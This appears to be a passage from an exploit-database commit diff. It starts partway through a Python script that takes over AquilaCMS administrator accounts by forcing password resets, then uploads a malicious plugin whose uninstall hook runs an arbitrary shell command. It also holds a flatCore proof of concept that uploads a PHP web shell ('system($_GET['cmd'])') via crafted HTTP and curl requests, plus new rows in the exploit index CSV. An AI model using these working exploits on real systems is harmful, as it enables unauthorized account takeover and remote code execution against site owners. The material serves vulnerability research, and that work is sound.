print(f"[+] Administrator account : {unescape_special_characters(email)}")
return json.loads(res.text)["data"]
return None
def create_plugin(plugin_name):
payload = textwrap.dedent(
f"""
const {{ exec }} = require("child_process");
/**
* This function is called when the plugin is desactivated or when we delete it
*/
module.exports = async function (resolve, reject) {{
try {{
exec("{args.command}");
return resolve();
}} catch (error) {{}}
}};
"""
).strip()
plugin = io.BytesIO()
with zipfile.ZipFile(plugin, "a", zipfile.ZIP_DEFLATED, False) as zip_file:
zip_file.writestr(
f"{plugin_name}/package.json",
io.BytesIO(f'{{ "name": "{plugin_name}" }}'.encode()).getvalue(),
)
zip_file.writestr(
f"{plugin_name}/info.json", io.BytesIO(b'{ "info": {} }').getvalue()
)
zip_file.writestr(
f"{plugin_name}/uninit.js", io.BytesIO(payload.encode()).getvalue()
)
plugin.seek(0)
return plugin
def rce(emails):
auth_token = get_admin_auth_token(emails)
if auth_token is None:
print("[-] Administrator account not found")
return
print("[+] Create malicious plugin")
plugin_name = uuid.uuid4().hex
plugin = create_plugin(plugin_name)
print("[+] Upload plugin")
headers = {"Authorization": auth_token}
files = {"file": (f"{plugin_name}.zip", plugin, "application/zip")}
requests.post(f"{args.url}/api/v2/modules/upload", headers=headers, files=files)
print("[+] Find uploaded plugin")
headers = {"Authorization": auth_token}
data = {"PostBody": {"limit": 0}}
res = requests.post(f"{args.url}/api/v2/modules", headers=headers, json=data)
plugin_id = None
for data in json.loads(res.text)["datas"]:
if data["name"] == plugin_name:
plugin_id = data["_id"]
print(f"[+] Plugin ID : {plugin_id}")
break
if plugin_id is None:
print("[-] Plugin not found")
return
print("[+] Deactivate plugin")
headers = {"Authorization": auth_token}
data = {"idModule": plugin_id, "active": False}
res = requests.post(f"{args.url}/api/v2/modules/toggle", headers=headers, json=data)
if res.status_code == 200:
print("[+] Command execution succeeded")
else:
print("[-] Command execution failed")
def main():
print("[*] Retrieve email addresses")
emails = get_user_emails()
print("\n[*] Reset password")
for email in emails:
reset_password(email)
print("\n[*] Perform remote code execution")
rce(emails)
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument(
"-u",
dest="url",
help="Site URL (e.g. www.aquila-cms.com)",
type=str,
required=True,
)
parser.add_argument(
"-p",
dest="password",
help="Password to use for password reset (e.g. HaXX0r3d!)",
type=str,
default="HaXX0r3d!",
)
parser.add_argument(
"-c",
dest="command",
help="Command to execute (e.g. touch /tmp/pwned)",
type=str,
default="touch /tmp/pwned",
)
args = parser.parse_args()
main()

78
exploits/php/webapps/52165.txt Normal file
View file

@ -0,0 +1,78 @@
# Exploit Title: [flatCore Arbitrary .php File Upload via acp/acp.php]
# Date: [2024-10-26]
# Exploit Author: [CodeSecLab]
# Vendor Homepage: [https://github.com/flatCore/flatCore-CMS]
# Software Link: [https://github.com/flatCore/flatCore-CMS]
# Version: [1.5.5]
# Tested on: [Ubuntu Windows]
# CVE : [CVE-2019-10652]
PoC
1)
1. Access the flatCore Admin Panel
URL: http://flatcore/acp/acp.php
Log in with valid administrative credentials.
2. Upload a Malicious PHP File
Navigate to the upload section where you can add new files or images. This is usually accessible via the "Media" or "Addons" feature in the admin panel.
3. Intercept and Modify the Upload Request
Using a tool like Burp Suite or by modifying the request directly, prepare the following POST request:
POST /acp/core/files.upload-script.php HTTP/1.1
Host: flatcore
Content-Type: multipart/form-data; boundary=---------------------------735323031399963166993862150
Content-Length: <calculated length>
Cookie: PHPSESSID=<valid_session_id>
-----------------------------735323031399963166993862150
Content-Disposition: form-data; name="file"; filename="exploit.php"
Content-Type: application/octet-stream
<?php
// Simple PHP backdoor code
echo "Vulnerable File Upload - PoC";
system($_GET['cmd']);
?>
-----------------------------735323031399963166993862150
Content-Disposition: form-data; name="upload_destination"
../content/files
-----------------------------735323031399963166993862150
Content-Disposition: form-data; name="csrf_token"
<valid_csrf_token>
-----------------------------735323031399963166993862150
Note: Replace <valid_session_id> and <valid_csrf_token> with values from your authenticated session.
4. Verification
After uploading, the PHP file should be accessible at: http://flatcore/content/files/exploit.php
Access the uploaded file: http://flatcore/content/files/exploit.php?cmd=whoami
PoC
2)
# PoC to exploit unrestricted file upload vulnerability in flatCore 1.4.7
# Target URL: http://flatcore/
# The attacker must be authenticated as an administrator to exploit this vulnerability
# Step 1: Log in as an administrator and obtain the CSRF token
# You need to obtain the CSRF token manually or through a script since the token is required for the file upload.
# Step 2: Upload a malicious PHP file using the file upload feature
# Create a PHP reverse shell or any arbitrary PHP code and save it as shell.php
echo "<?php phpinfo(); ?>" > shell.php
# Upload the PHP file using cURL
curl -X POST "http://flatcore/acp/core/files.upload-script.php" \
-H "Content-Type: multipart/form-data" \
-F "file=@shell.php" \
-F "csrf_token=YOUR_CSRF_TOKEN_HERE" \
-F "upload_destination=../content/files" \
-F "file_mode=overwrite" \
-b "PHPSESSID=YOUR_SESSION_ID_HERE"
# Replace YOUR_CSRF_TOKEN_HERE and YOUR_SESSION_ID_HERE with valid CSRF token and PHPSESSID
# Step 3: Access the uploaded malicious PHP file
echo "Visit the following URL to execute the uploaded PHP file:"
echo "http://flatcore/content/files/shell.php"
This PoC demonstrates how an attacker can exploit the unrestricted file upload vulnerability to upload a PHP file and execute it on the server.
[Replace Your Domain Name]

11
files_exploits.csv
View file

@ -10397,6 +10397,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
3851,exploits/multiple/dos/3851.c,"ZOO - '.ZOO' Decompression Infinite Loop Denial of Service (PoC)",2007-05-04,Jean-Sébastien,dos,multiple,,2007-05-03,2017-10-07,1,CVE-2007-1669,,,,,
42294,exploits/multiple/dos/42294.py,"Zookeeper 3.5.2 Client - Denial of Service",2017-07-02,"Brandon Dennis",dos,multiple,2181,2017-07-04,2017-10-04,0,CVE-2017-5637,,,,,
32581,exploits/multiple/dos/32581.txt,"Zope 2.11.2 - PythonScript Multiple Remote Denial of Service Vulnerabilities",2008-11-12,"Marc-Andre Lemburg",dos,multiple,,2008-11-12,2014-03-30,1,CVE-2008-5102;OSVDB-50487,,,,,https://www.securityfocus.com/bid/32267/info
52160,exploits/multiple/hardware/52160.py,"Cosy+ firmware 21.2s7 - Command Injection",2025-04-10,CodeB0ss,hardware,multiple,,2025-04-10,2025-04-10,0,CVE-2024-33896,,,,,
11651,exploits/multiple/local/11651.sh,"(Tod Miller's) Sudo/SudoEdit 1.6.9p21/1.7.2p4 - Local Privilege Escalation",2010-03-07,kingcope,local,multiple,,2010-03-06,,1,,,,,,
51849,exploits/multiple/local/51849.py,"A-PDF All to MP3 Converter 2.0.0 - DEP Bypass via HeapCreate + HeapAlloc",2024-03-03,"George Washington",local,multiple,,2024-03-03,2024-03-03,0,,,,,,
38835,exploits/multiple/local/38835.py,"abrt (Centos 7.1 / Fedora 22) - Local Privilege Escalation",2015-12-01,rebel,local,multiple,,2015-12-01,2018-11-17,1,CVE-2015-5287;CVE-2015-5273;OSVDB-130747;OSVDB-130746;OSVDB-130745;OSVDB-130609,,,http://www.exploit-db.com/screenshots/idlt39000/screen-shot-2015-12-03-at-40702-pm.png,,
@ -11078,6 +11079,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
17068,exploits/multiple/remote/17068.py,"jHTTPd 0.1a - Directory Traversal",2011-03-29,"AutoSec Tools",remote,multiple,,2011-03-29,2011-03-29,0,,,,,,
25191,exploits/multiple/remote/25191.txt,"JoWood Chaser 1.0/1.50 - Remote Buffer Overflow",2005-03-07,"Luigi Auriemma",remote,multiple,,2005-03-07,2013-05-06,1,,,,,,https://www.securityfocus.com/bid/12733/info
24981,exploits/multiple/remote/24981.txt,"JPegToAvi 1.5 - File List Buffer Overflow",2004-12-15,"James Longstreet",remote,multiple,,2004-12-15,2013-04-30,1,,,,,,https://www.securityfocus.com/bid/11976/info
52158,exploits/multiple/remote/52158.py,"K7 Ultimate Security K7RKScan.sys 17.0.2019 - Denial Of Service (DoS)",2025-04-10,"M. Akil Gündoğan",remote,multiple,,2025-04-10,2025-04-10,0,CVE-2024-36424,,,,,
11817,exploits/multiple/remote/11817.txt,"KDE 4.4.1 - Ksysguard Remote Code Execution (via Cross Application Scripting)",2010-03-20,emgent,remote,multiple,,2010-03-19,,1,,,,,,
24414,exploits/multiple/remote/24414.txt,"Keene Digital Media Server 1.0.2 - Directory Traversal",2004-08-26,"GulfTech Security",remote,multiple,,2004-08-26,2018-01-05,1,"BID: 11057;GTSA-00044",,,,,http://gulftech.org/advisories/Digital%20Media%20Server%20Arbitrary%20File%20Access/44
20181,exploits/multiple/remote/20181.txt,"Kerberos 4 4.0/5 5.0 - KDC Spoofing",2000-08-28,"Dug Song",remote,multiple,,2000-08-28,2012-08-05,1,OSVDB-84635,,,,,https://www.securityfocus.com/bid/1616/info
@ -11794,6 +11796,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
50601,exploits/multiple/webapps/50601.txt,"Cibele Thinfinity VirtualUI 2.5.41.0 - User Enumeration",2021-12-16,"Daniel Morales",webapps,multiple,,2021-12-16,2021-12-16,0,CVE-2021-44848,,,,,
11403,exploits/multiple/webapps/11403.txt,"Cisco Collaboration Server 5 - Cross-Site Scripting / Source Code Disclosure",2010-02-11,s4squatch,webapps,multiple,80,2010-02-10,,1,OSVDB-62460;CVE-2010-0642;OSVDB-62459;CVE-2010-0641,,,,,
44324,exploits/multiple/webapps/44324.py,"Cisco node-jos < 0.11.0 - Re-sign Tokens",2018-03-20,zioBlack,webapps,multiple,,2018-03-21,2019-07-25,0,CVE-2018-0114,,,,,https://github.com/zi0Black/POC-CVE-2018-0114/tree/d3bddb421726a9eddbabfd6a1ca58ff4abca93af
52155,exploits/multiple/webapps/52155.py,"Cisco Smart Software Manager On-Prem 8-202206 - Account Takeover",2025-04-10,"Mohammed Adel",webapps,multiple,,2025-04-10,2025-04-10,0,CVE-2024-20419,,,,,
37816,exploits/multiple/webapps/37816.txt,"Cisco Unified Communications Manager - Multiple Vulnerabilities",2015-08-18,"Bernhard Mueller",webapps,multiple,,2015-08-18,2015-08-18,0,CVE-2014-8008;CVE-2014-6271;OSVDB-126132;OSVDB-126131;OSVDB-117422,,,,,http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140926-bash
48975,exploits/multiple/webapps/48975.py,"Citadel WebCit < 926 - Session Hijacking Exploit",2020-10-30,"Simone Quatrini",webapps,multiple,,2020-10-30,2020-10-30,0,,,,,,
47930,exploits/multiple/webapps/47930.txt,"Citrix Application Delivery Controller (ADC) and Gateway 13.0 - Path Traversal",2020-01-16,"Dhiraj Mishra",webapps,multiple,,2020-01-16,2020-01-16,0,CVE-2019-19781,,,,,
@ -14228,6 +14231,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
10816,exploits/php/webapps/10816.txt,"Aptgp.1.3.0c - Cross-Site Scripting",2009-12-30,indoushka,webapps,php,,2009-12-29,,0,,,,,,
12567,exploits/php/webapps/12567.html,"Aqar Script 1.0 - Remote Bypass",2010-05-11,indoushka,webapps,php,,2010-05-10,,0,,,,,,
8432,exploits/php/webapps/8432.txt,"Aqua CMS - 'Username' SQL Injection",2009-04-14,halkfild,webapps,php,,2009-04-13,,1,OSVDB-53691;CVE-2009-1317;OSVDB-53690,,,,,http://crackfor.me/bugtraq/aquacms.v1.1.txt
52164,exploits/php/webapps/52164.py,"AquilaCMS 1.409.20 - Remote Command Execution (RCE)",2025-04-10,"Eui Chul Chung",webapps,php,,2025-04-10,2025-04-10,0,CVE-2024-48573,,,,,
2931,exploits/php/webapps/2931.txt,"AR Memberscript - 'usercp_menu.php' Remote File Inclusion",2006-12-14,ex0,webapps,php,,2006-12-13,,1,OSVDB-57302;CVE-2006-6590,,,,,
38015,exploits/php/webapps/38015.txt,"AR Web Content Manager (AWCM) - 'cookie_gen.php' Arbitrary Cookie Generation",2012-11-08,"Sooel Son",webapps,php,,2012-11-08,2017-10-20,1,CVE-2012-2437;OSVDB-87922,,,,,https://www.securityfocus.com/bid/56465/info
27642,exploits/php/webapps/27642.txt,"AR-Blog 5.2 - 'print.php' Cross-Site Scripting",2006-04-14,ALMOKANN3,webapps,php,,2006-04-14,2013-08-17,1,CVE-2006-1893;OSVDB-24863,,,,,https://www.securityfocus.com/bid/17522/info
@ -15666,6 +15670,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
38339,exploits/php/webapps/38339.txt,"Centreon 2.6.1 - Multiple Vulnerabilities",2015-09-28,LiquidWorm,webapps,php,80,2015-09-28,2015-09-28,0,,,,,,http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5263.php
23362,exploits/php/webapps/23362.py,"Centreon Enterprise Server 2.3.3 < 2.3.9-4 - Blind SQL Injection",2012-12-13,modpr0be,webapps,php,,2012-12-13,2012-12-13,0,CVE-2012-5967;OSVDB-88430,,,,,
11979,exploits/php/webapps/11979.pl,"Centreon IT & Network Monitoring 2.1.5 - SQL Injection",2010-03-31,"Jonathan Salwan",webapps,php,,2010-03-30,,1,OSVDB-63347;CVE-2010-1301,,,,,
52156,exploits/php/webapps/52156.py,"Centron 19.04 - Remote Code Execution (RCE)",2025-04-10,"Starry Sky",webapps,php,,2025-04-10,2025-04-10,0,CVE-2019-13024,,,,,
38074,exploits/php/webapps/38074.txt,"Cerb 7.0.3 - Cross-Site Request Forgery",2015-09-02,"High-Tech Bridge SA",webapps,php,80,2015-09-02,2015-09-02,0,CVE-2015-6545;OSVDB-126097,,,,http://www.exploit-db.comcerb-7.0.3.tar.gz,https://www.htbridge.com/advisory/HTB23269
39526,exploits/php/webapps/39526.sh,"Cerberus Helpdesk (Cerb5) 5 < 6.7 - Password Hash Disclosure",2016-03-07,asdizzle_,webapps,php,80,2016-03-07,2016-03-10,1,,,,http://www.exploit-db.com/screenshots/idlt40000/kali-20-clean-2016-03-10-19-35-06.png,http://www.exploit-db.comcerb5-5_4_4.zip,
25803,exploits/php/webapps/25803.txt,"Cerberus Helpdesk 0.97.3/2.6.1 - Multiple Cross-Site Scripting Vulnerabilities",2005-06-08,"Dedi Dwianto",webapps,php,,2005-06-08,2013-05-29,1,,,,,,https://www.securityfocus.com/bid/13897/info
@ -16195,6 +16200,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
44567,exploits/php/webapps/44567.txt,"Cockpit CMS 0.4.4 < 0.5.5 - Server-Side Request Forgery",2018-05-02,"Qian Wu_ Bo Wang_ Jiawang Zhang",webapps,php,80,2018-05-02,2018-05-02,0,CVE-2018-9302,"Server-Side Request Forgery (SSRF)",,,http://www.exploit-db.comcockpit-0.5.5.tar.gz,
49390,exploits/php/webapps/49390.txt,"Cockpit CMS 0.6.1 - Remote Code Execution",2021-01-07,"Rafael Resende",webapps,php,,2021-01-07,2021-01-07,0,,,,,,
3251,exploits/php/webapps/3251.txt,"CoD2: DreamStats 4.2 - 'index.php' Remote File Inclusion",2007-02-02,"ThE dE@Th",webapps,php,,2007-02-01,,1,OSVDB-33095;CVE-2007-0757,,,,,
52159,exploits/php/webapps/52159.txt,"CodeAstro Online Railway Reservation System 1.0 - Cross Site Scripting (XSS)",2025-04-10,"Raj Nandi",webapps,php,,2025-04-10,2025-04-10,0,CVE-2024-7815,,,,,
3599,exploits/php/webapps/3599.txt,"CodeBB 1.0 Beta 2 - 'phpbb_root_path' Remote File Inclusion",2007-03-28,"Alkomandoz Hacker",webapps,php,,2007-03-27,,1,OSVDB-35423;CVE-2007-1839;OSVDB-35422,,,,,
3711,exploits/php/webapps/3711.html,"CodeBreak 1.1.2 - 'codebreak.php' Remote File Inclusion",2007-04-11,"John Martinelli",webapps,php,,2007-04-10,2016-11-14,1,OSVDB-34831;CVE-2007-1996,,,,,
41550,exploits/php/webapps/41550.txt,"Codecanyon Clone Script - SQL Injection",2017-03-08,"Ihsan Sencan",webapps,php,,2017-03-08,2017-03-08,0,,,,,,
@ -18583,6 +18589,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
17099,exploits/php/webapps/17099.txt,"Feng Office 1.7.3.3 - Cross-Site Request Forgery",2011-04-01,"High-Tech Bridge SA",webapps,php,,2011-04-01,2011-04-01,1,OSVDB-71472,,,,,http://www.htbridge.ch/advisory/xsrf_csrf_in_feng_office.html
35041,exploits/php/webapps/35041.py,"Feng Office 1.7.4 - Arbitrary File Upload",2014-10-23,"AutoSec Tools",webapps,php,,2014-10-23,2014-10-23,0,,,,,,
35042,exploits/php/webapps/35042.txt,"Feng Office 1.7.4 - Cross-Site Scripting",2014-10-23,"AutoSec Tools",webapps,php,,2014-10-23,2016-11-12,0,,,,,,https://www.securityfocus.com/bid/47049/info
52154,exploits/php/webapps/52154.NA,"Feng Office 3.11.1.2 - SQL Injection",2025-04-10,"Andrey Stoykov",webapps,php,,2025-04-10,2025-04-10,0,CVE-2024-6039,,,,,
46471,exploits/php/webapps/46471.rb,"Feng Office 3.7.0.5 - Remote Command Execution (Metasploit)",2019-02-28,AkkuS,webapps,php,,2019-02-28,2019-03-08,0,CVE-2019-9623,,,,,
35914,exploits/php/webapps/35914.txt,"ferretCMS 1.0.4-alpha - Multiple Vulnerabilities",2015-01-26,"Steffen Rösemann",webapps,php,80,2015-01-26,2015-01-26,1,OSVDB-117806;OSVDB-117612;OSVDB-117533;OSVDB-117532;CVE-2015-1374;CVE-2015-1373;CVE-2015-1372;OSVDB-117531;CVE-2015-1371;OSVDB-117530,,,,,
10552,exploits/php/webapps/10552.txt,"FestOs 2.2.1 - Multiple Remote File Inclusions",2009-12-19,cr4wl3r,webapps,php,,2009-12-18,,0,,,,,http://www.exploit-db.comfestos_2_2_1.tar.gz,
@ -18683,6 +18690,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
52054,exploits/php/webapps/52054.txt,"Flatboard 3.2 - Stored Cross-Site Scripting (XSS) (Authenticated)",2024-06-26,tmrswrr,webapps,php,,2024-06-26,2024-06-26,0,,,,,,
8549,exploits/php/webapps/8549.txt,"Flatchat 3.0 - 'pmscript.php' Local File Inclusion",2009-04-27,SirGod,webapps,php,,2009-04-26,,1,OSVDB-54111;CVE-2009-1486,,,,,
1405,exploits/php/webapps/1405.pl,"FlatCMS 1.01 - 'file_editor.php' Remote Command Execution",2006-01-04,cijfer,webapps,php,,2006-01-03,,1,,,,,,
52165,exploits/php/webapps/52165.txt,"flatCore 1.5.5 - Arbitrary File Upload",2025-04-10,CodeSecLab,webapps,php,,2025-04-10,2025-04-10,0,CVE-2019-10652,,,,,
50262,exploits/php/webapps/50262.py,"FlatCore CMS 2.0.7 - Remote Code Execution (RCE) (Authenticated)",2021-09-06,"Mason Soroka-Gill",webapps,php,,2021-09-06,2021-09-06,0,CVE-2021-39608,,,,http://www.exploit-db.comflatCore-CMS-2.0.7.tar.gz,
51068,exploits/php/webapps/51068.txt,"FlatCore CMS 2.1.1 - Stored Cross-Site Scripting (XSS)",2023-03-27,"Sinem Şahin",webapps,php,,2023-03-27,2023-03-27,0,,,,,,
11515,exploits/php/webapps/11515.txt,"FlatFile Login System - Remote Password Disclosure",2010-02-20,ViRuSMaN,webapps,php,,2010-02-19,,1,,,,,http://www.exploit-db.com269_flatfile_login.zip,
@ -25803,6 +25811,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
50961,exploits/php/webapps/50961.py,"Pandora FMS v7.0NG.742 - Remote Code Execution (RCE) (Authenticated)",2022-06-14,UNICORD,webapps,php,,2022-06-14,2022-06-14,0,CVE-2020-5844,,,,,
48064,exploits/php/webapps/48064.py,"PANDORAFMS 7.0 - Authenticated Remote Code Execution",2020-02-13,"Engin Demirbilek",webapps,php,,2020-02-13,2020-02-13,0,CVE-2020-8947,,,,,
48707,exploits/php/webapps/48707.txt,"PandoraFMS 7.0 NG 746 - Persistent Cross-Site Scripting",2020-07-26,AppleBois,webapps,php,,2020-07-26,2020-07-26,0,CVE-2020-11749,,,,,
52157,exploits/php/webapps/52157.py,"PandoraFMS 7.0NG.772 - SQL Injection",2025-04-10,"Osama Yousef",webapps,php,,2025-04-10,2025-04-10,0,CVE-2023-44088,,,,,
48700,exploits/php/webapps/48700.txt,"PandoraFMS NG747 7.0 - 'filename' Persistent Cross-Site Scripting",2020-07-26,"Emre ÖVÜNÇ",webapps,php,,2020-07-26,2020-12-07,0,,,,,,
25111,exploits/php/webapps/25111.txt,"PaNews 2.0 - Cross-Site Scripting",2005-02-16,pi3ch,webapps,php,,2005-02-16,2013-05-01,1,,,,,,https://www.securityfocus.com/bid/12576/info
25145,exploits/php/webapps/25145.txt,"PANews 2.0 - PHP Remote Code Execution",2005-02-21,tjomka,webapps,php,,2005-02-21,2013-05-02,1,,,,,,https://www.securityfocus.com/bid/12611/info
@ -31464,6 +31473,8 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
29704,exploits/php/webapps/29704.txt,"Tyger Bug Tracking System 1.1.3 - 'login.php?PATH_INFO' Cross-Site Scripting",2007-02-26,CorryL,webapps,php,,2007-02-26,2013-11-19,1,CVE-2007-1291;OSVDB-33858,,,,,https://www.securityfocus.com/bid/22799/info
29705,exploits/php/webapps/29705.txt,"Tyger Bug Tracking System 1.1.3 - 'register.php?PATH_INFO' Cross-Site Scripting",2007-02-26,CorryL,webapps,php,,2007-02-26,2013-11-19,1,CVE-2007-1291;OSVDB-33859,,,,,https://www.securityfocus.com/bid/22799/info
29703,exploits/php/webapps/29703.txt,"Tyger Bug Tracking System 1.1.3 - 'ViewBugs.php?s' SQL Injection",2007-02-26,CorryL,webapps,php,,2007-02-26,2013-11-19,1,CVE-2007-1289;OSVDB-35817,,,,,https://www.securityfocus.com/bid/22799/info
52161,exploits/php/webapps/52161.go,"Typecho 1.3.0 - Race Condition",2025-04-10,cyberaz0r,webapps,php,,2025-04-10,2025-04-10,0,CVE-2024-35539,,,,,
52162,exploits/php/webapps/52162.go,"Typecho 1.3.0 - Stored Cross-Site Scripting (XSS)",2025-04-10,cyberaz0r,webapps,php,,2025-04-10,2025-04-10,0,CVE-2024-35540,,,,,
49128,exploits/php/webapps/49128.txt,"TypeSetter 5.1 - CSRF (Change admin e-mail)",2020-12-01,"Alperen Ergel",webapps,php,,2020-12-01,2020-12-01,0,,,,,,
44028,exploits/php/webapps/44028.txt,"TypeSetter CMS 5.1 - 'Host' Header Injection",2018-02-13,"Navina Asrani",webapps,php,,2018-02-13,2018-02-13,0,CVE-2018-6889,,,,,
48852,exploits/php/webapps/48852.txt,"Typesetter CMS 5.1 - 'Site Title' Persistent Cross-Site Scripting",2020-10-01,"Alperen Ergel",webapps,php,,2020-10-01,2020-10-01,0,,,,,,

Can't render this file because it is too large.